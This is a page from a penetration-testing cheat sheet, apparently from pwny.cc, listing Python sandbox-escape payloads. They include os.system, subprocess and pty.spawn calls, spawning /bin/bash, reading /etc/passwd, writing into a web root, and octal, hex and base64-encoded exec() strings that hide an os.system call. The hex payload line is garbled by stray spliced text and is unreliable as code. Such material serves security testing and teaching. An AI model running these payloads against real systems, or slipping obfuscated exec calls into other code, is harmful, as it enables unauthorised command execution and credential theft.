pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Windows
OTHER
Sandbox Escape
Cracking
Powered By GitBook
Sandbox Escape

Python

Command Execution Libraries

1
os.system("ls")
2
os.popen("ls").read()
3
commands.getstatusoutput("ls")
4
commands.getoutput("ls")
5
commands.getstatus("file/path")
6
subprocess.call("ls", shell=True)
7
subprocess.Popen("ls", shell=True)
8
pty.spawn("ls")
9
pty.spawn("/bin/bash")
10
platform.popen("ls").read()
11
open("/etc/passwd").read()
12
open('/var/www/html/input', 'w').write('123')
Copied!

Executing python code

1
#Octal
2
exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")
3
4
#Hex
5
exec("\x5f\x5f\x69\x6d\xIf youca70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")
6
7
#Base64
8
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
9
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
Copied!
Previous
Exfiltration
Next - OTHER
Cracking
Last modified 8mo ago
Copy link
Contents
Python
Command Execution Libraries
Executing python code